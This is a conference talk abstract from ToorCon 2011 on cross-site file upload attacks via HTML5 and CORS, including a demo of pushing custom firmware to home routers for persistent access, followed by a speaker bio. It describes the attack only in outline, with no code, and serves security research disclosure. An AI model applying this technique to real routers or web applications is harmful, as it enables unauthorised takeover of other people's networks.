Post-Exploitation With Javascript - The New Cross-Site F-U!

Presented at ToorCon San Diego 13 (2011), Oct. 9, 2011, 4:30 p.m. (20 minutes)

Many sites that have counter-measures for CSRF often forget to use the same mechanisms on file upload functionality. This hasn't been a problem until recently, as new functionality has been added to JavaScript that allows us to abuse these privileges. This presentation will demonstrate how a browser can be tricked into submitting an arbitrary file to a web application. Some might call this "Advanced Persistent CSRF", but the W3C specification just calls it a feature. Thanks to HTML5 and Cross-Orgin Resource Sharing, no plugins are required, and the newer your browser is, the more likely you are prone to this attack. I'll show you why this makes attacking web apps even more fun then ever before. There will be a live demo where I show how this technique can be used to completely own the home routers of your friends, giving access far beyond remote administration; we upload customized firmware that provides us with persistent access to the network.


  • Phil Purviance / superevr as Phil Purviance (superevr)
    Phil Purviance is an Information Security Specialist for AppSec Consulting, Inc. He has found critical vulnerabilities in hundreds of web sites, and is on the Google and Facebook Security Halls of Fame. His past exploit talks include cross-site scripting vulnerabilities in Skype for iOS, and revealing flaws in the Ruby on Rails and Django web frameworks.

Similar Presentations: